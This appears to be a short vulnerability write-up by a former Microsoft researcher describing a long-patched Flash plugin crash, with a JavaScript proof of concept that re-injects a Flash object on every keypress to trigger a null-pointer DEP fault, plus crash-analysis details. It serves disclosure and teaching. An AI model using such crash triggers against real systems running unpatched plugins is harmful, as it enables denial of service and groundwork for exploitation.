I found that repeatedly reloading a Flash object via innerHTML in a tight onkeypress loop caused a crash in Flash11f rated PROBABLY_EXPLOITABLE. Each keypress replaced the DOM with a new Flash object parameterized with a random query string, and the rapid churn of object creation and destruction triggered a null-pointer DEP violation inside the Flash plugin.

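// Script text that replaces the page body with a new Flash <object>; Math.random() runs on each eval, so the movie URL differs every time.
var code = 'document.body.innerHTML =\'<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100" height="100"><param name="movie" value="call.swf?RND=\'+Math.random()+\'" /></object>\';';
// Re-run the injection on every keypress; a held key repeats it rapidly.
document.onkeypress = function () { eval(code); };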

Holding down any key caused the browser to rapidly re-inject the Flash object with a fresh random parameter each time. The fault landed at address 0x00000000 — a DEP violation at the null address — called from Flash11f+0xdbc75, rated PROBABLY_EXPLOITABLE as a near-null software NX fault.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.